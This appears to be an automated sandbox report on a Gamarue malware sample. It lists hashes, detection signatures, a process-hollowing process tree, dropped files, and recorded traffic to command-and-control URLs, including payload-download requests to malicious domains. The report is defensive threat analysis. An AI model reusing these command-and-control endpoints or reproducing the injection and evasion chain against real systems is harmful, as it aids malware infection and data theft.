Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hu25VEa8Dr.exe

Overview

General Information

Sample Name:Hu25VEa8Dr.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Analysis ID:1317431
MD5:bc76bd7b332aa8f6aedbb8e11b7ba9b6
SHA1:c6858031315a50ec87e37966291ec69b64600efb
SHA256:9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Infos:

Detection

Gamarue
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Tries to download HTTP data from a sinkholed server
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected Gamarue
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Contain functionality to detect virtual machines
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Contains functionality to check if Internet connection is working
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to get notified if a device is plugged in / out
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • Hu25VEa8Dr.exe (PID: 2948 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)
    • Sahofivizu.exe (PID: 920 cmdline: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: 7FE00CC4EA8429629AC0AC610DB51993)
      • Hu25VEa8Dr.exe (PID: 1724 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)
        • Hu25VEa8Dr.exe (PID: 2092 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)
          • msiexec.exe (PID: 1948 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)
            • Lohonibuhod.exe (PID: 1396 cmdline: "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: 44902781C1865978B17F396DB51D85E1)
              • msiexec.exe (PID: 2748 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)
                • msiexec.exe (PID: 2948 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)
    • svchost.exe (PID: 1740 cmdline: C:\Windows\syswow64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: svchost.exe PID: 1740JoeSecurity_GamarueYara detected GamarueJoe Security
    No Sigma rule has matched
    Timestamp:147.75.61.38192.168.2.2280491662031515 10/01/23-06:01:37.455932
    SID:2031515
    Source Port:80
    Destination Port:49166
    Protocol:TCP
    Classtype:Misc activity

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Hu25VEa8Dr.exeReversingLabs: Detection: 95%
    Source: Hu25VEa8Dr.exeVirustotal: Detection: 81%Perma Link
    Source: Hu25VEa8Dr.exeAvira: detected
    Source: http://orzdwjtvmein.in/in.phpAvira URL Cloud: Label: malware
    Source: http://bdcrqgonzmwuehky.nl/in.phpAvira URL Cloud: Label: malware
    Source: http://somicrososoft.ru/in.phpAvira URL Cloud: Label: malware
    Source: http://xdqzpbcgrvkj.ru/in.phpAvira URL Cloud: Label: malware
    Source: http://anam0rph.su/in.phpAvira URL Cloud: Label: malware
    Source: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqhAvira URL Cloud: Label: malware
    Source: http://ygiudewsqhct.in/in.phpAvira URL Cloud: Label: malware
    Source: xdqzpbcgrvkj.ruVirustotal: Detection: 18%Perma Link
    Source: http://orzdwjtvmein.in/in.phpVirustotal: Detection: 11%Perma Link
    Source: http://pe.suckmycocklameavindustry.in/Virustotal: Detection: 6%Perma Link
    Source: anam0rph.suVirustotal: Detection: 11%Perma Link
    Source: http://bdcrqgonzmwuehky.nl/in.phpVirustotal: Detection: 11%Perma Link
    Source: http://somicrososoft.ru/in.phpVirustotal: Detection: 14%Perma Link
    Source: pe.suckmycocklameavindustry.inVirustotal: Detection: 6%Perma Link
    Source: http://anam0rph.su/in.phpVirustotal: Detection: 13%Perma Link
    Source: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqhVirustotal: Detection: 14%Perma Link
    Source: http://ygiudewsqhct.in/in.phpVirustotal: Detection: 13%Perma Link
    Source: http://xdqzpbcgrvkj.ru/in.phpVirustotal: Detection: 16%Perma Link
    Source: http://sc.suckmycocklameavindustry.in/Virustotal: Detection: 6%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllAvira: detection malicious, Label: HEUR/AGEN.1358866
    Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmpAvira: detection malicious, Label: TR/AD.Gamarue.njjtd
    Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllAvira: detection malicious, Label: TR/Symmi.17001.30
    Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllAvira: detection malicious, Label: TR/Graftor.75972.7
    Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllAvira: detection malicious, Label: TR/Symmi.17001.22
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeAvira: detection malicious, Label: TR/Agent.hwpf
    Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dllAvira: detection malicious, Label: HEUR/AGEN.1328724
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batAvira: detection malicious, Label: TR/AD.Gamarue.djauj
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeAvira: detection malicious, Label: HEUR/AGEN.1344339
    Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllAvira: detection malicious, Label: TR/Symmi.17001.23
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeAvira: detection malicious, Label: TR/AD.Gamarue.djauj
    Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllAvira: detection malicious, Label: HEUR/AGEN.1322941
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batReversingLabs: Detection: 86%
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batVirustotal: Detection: 84%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmpReversingLabs: Detection: 95%
    Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmpVirustotal: Detection: 81%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Firozedikami.dllReversingLabs: Detection: 59%
    Source: C:\Users\user\AppData\Local\Temp\Firozedikami.dllVirustotal: Detection: 59%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllReversingLabs: Detection: 76%
    Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dllVirustotal: Detection: 75%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dllVirustotal: Detection: 65%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeReversingLabs: Detection: 75%
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeVirustotal: Detection: 77%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeReversingLabs: Detection: 86%
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeVirustotal: Detection: 84%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeReversingLabs: Detection: 56%
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeVirustotal: Detection: 60%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllReversingLabs: Detection: 64%
    Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dllVirustotal: Detection: 74%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllReversingLabs: Detection: 59%
    Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dllVirustotal: Detection: 71%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dllReversingLabs: Detection: 78%
    Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dllVirustotal: Detection: 75%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllReversingLabs: Detection: 66%
    Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dllVirustotal: Detection: 67%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllReversingLabs: Detection: 70%
    Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dllVirustotal: Detection: 72%Perma Link
    Source: C:\ProgramData\Local Settings\Temp\msoiruj.batJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 3_2_00402493 PathCombineA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,3_2_00402493
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 7_2_00402493 PathCombineA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,7_2_00402493

    Compliance

    barindex
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeUnpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeUnpacked PE file: 7.2.msiexec.exe.400000.0.unpack
    Source: Hu25VEa8Dr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Binary string: T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb source: svchost.exe, svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: T:\ldr\CUSTOM\local\local\Release\ADropper.pdb source: Hu25VEa8Dr.exe, Hu25VEa8Dr.exe, 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp
    Source: Binary string: svchost.pdb source: svchost.exe, 00000009.00000002.381614429.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E29C0 _memset,UnregisterDeviceNotification,CloseHandle,UnregisterDeviceNotification,CloseHandle,wsprintfW,wsprintfW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,wsprintfW,CreateFileW,RegisterDeviceNotificationW,Sleep,DefWindowProcW,UnregisterDeviceNotification,CloseHandle,PostQuitMessage,9_2_001E29C0
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405D07 FindFirstFileA,FindClose,0_2_00405D07
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405331
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405D07 FindFirstFileA,FindClose,5_2_00405D07
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_00405331
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_0040263E FindFirstFileA,5_2_0040263E
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1E80 GetFileAttributesW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,MoveFileExW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,9_2_001E1E80
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1700 GetDriveTypeW,wsprintfW,wsprintfW,FindFirstFileW,DeleteFileW,wsprintfW,wsprintfW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,SetFileAttributesW,FindNextFileW,FindClose,9_2_001E1700
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1B70 wsprintfW,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,FindClose,FindClose,9_2_001E1B70
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,9_2_001E10D0

    Networking

    barindex
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 147.75.61.38 80Jump to behavior
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: pe.suckmycocklameavindustry.in
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: xdqzpbcgrvkj.ru
    Source: C:\Windows\SysWOW64\svchost.exeDomain query: anam0rph.su
    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.29.71.138 80Jump to behavior
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Oct 2023 04:01:37 GMTContent-Length: 607Content-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
    Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 147.75.61.38:80 -> 192.168.2.22:49166
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00021474 socket,connect,getsockname,shutdown,closesocket, www.update.microsoft.com9_2_00021474
    Source: global trafficHTTP traffic detected: POST /in.php HTTP/1.1Host: xdqzpbcgrvkj.ruUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: 84Connection: close
    Source: global trafficHTTP traffic detected: GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pe.suckmycocklameavindustry.inConnection: Keep-Alive
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://anam0rph.su/in.php
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://bdcrqgonzmwuehky.nl/in.php
    Source: svchost.exeString found in binary or memory: http://img.suckmycocklameavindustry.in/
    Source: Hu25VEa8Dr.exe, 00000003.00000002.350134891.0000000002120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/
    Source: msiexec.exe, msiexec.exe, 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000005.00000000.351213851.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000007.00000000.364458175.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000008.00000000.365114158.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://orzdwjtvmein.in/in.php
    Source: svchost.exeString found in binary or memory: http://pe.suckmycocklameavindustry.in/
    Source: svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://
    Source: svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff
    Source: svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl
    Source: svchost.exe, 00000009.00000002.381503603.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381500240.000000000044A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:
    Source: svchost.exeString found in binary or memory: http://sc.suckmycocklameavindustry.in/
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://somicrososoft.ru/in.php
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://xdqzpbcgrvkj.ru/in.php
    Source: svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh
    Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ygiudewsqhct.in/in.php
    Source: unknownHTTP traffic detected: POST /in.php HTTP/1.1Host: xdqzpbcgrvkj.ruUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: 84Connection: close
    Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dtkdvjezlgdvslgbvqqjiiheaxroigff[1].htmJump to behavior
    Source: unknownDNS traffic detected: queries for: xdqzpbcgrvkj.ru
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E1430 _memset,_memset,_memset,GetTempPathW,GetTempFileNameW,RegOpenKeyExW,RegQueryValueExW,RegSetValueExW,RegCloseKey,URLDownloadToFileW,DeleteFileW,DeleteFileW,SetFileAttributesW,DeleteFileW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,RegOpenKeyExW,RegSetValueExW,RegCloseKey,VirtualFree,CloseHandle,DeleteFileW,DeleteFileW,SetFileAttributesW,DeleteFileW,9_2_001E1430
    Source: global trafficHTTP traffic detected: GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pe.suckmycocklameavindustry.inConnection: Keep-Alive
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_00404EE8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EE8
    Source: Hu25VEa8Dr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FA
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030FA
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004061280_2_00406128
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004046F90_2_004046F9
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 0_2_004068FF0_2_004068FF
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040F80F4_2_0040F80F
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040F0384_2_0040F038
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 4_2_0040D6094_2_0040D609
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004061285_2_00406128
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004046F95_2_004046F9
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 5_2_004068FF5_2_004068FF
    Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exeCode function: 8_2_004017AF8_2_004017AF
    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_001E21A09_2_001E21A0
    Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exeCode function: 2_2_10001000 bedevahetay,LoadLibraryA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,2_2_10001000
    Source: C:\Users\user\Desktop\Hu25VEa8Dr.exeCode function: 3_2_00402298 PathCombineA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,3_2_00402298
    Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exeCode function: 6_2_10001000 zejutuhodomo,GetModuleHandleA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,6_2_10001000
